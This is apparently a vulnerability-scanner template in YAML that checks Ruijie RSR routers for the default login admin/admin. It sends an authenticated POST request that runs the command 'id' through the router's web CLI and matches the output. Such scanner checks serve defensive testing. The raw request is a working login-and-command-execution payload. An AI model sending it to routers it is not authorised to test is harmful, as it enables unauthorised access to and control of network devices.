id: Ruijie-RSR-Router-WeakPassword

info:
  name: Ruijie RSR Router Weak Password
  author: lemonlove7
  severity: critical
  description: 存在弱口令admin/admin，攻击者可通过该账号登录路由器后台进行进一步攻击。

http:
  - raw:
      - |
        POST /WEB_VMS/LEVEL15/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: text/plain;charset=UTF-8
        Authorization: Basic YWRtaW46YWRtaW4=

        command=id&strurl=exec%04&mode=%02PRIV_EXEC&signname=Red-Giant.

    matchers-condition: and
    matchers:
      - type: status
        status:
          - 200
      - type: word
        words:
          - "WebCLI"
          - "Command was:"
        part: body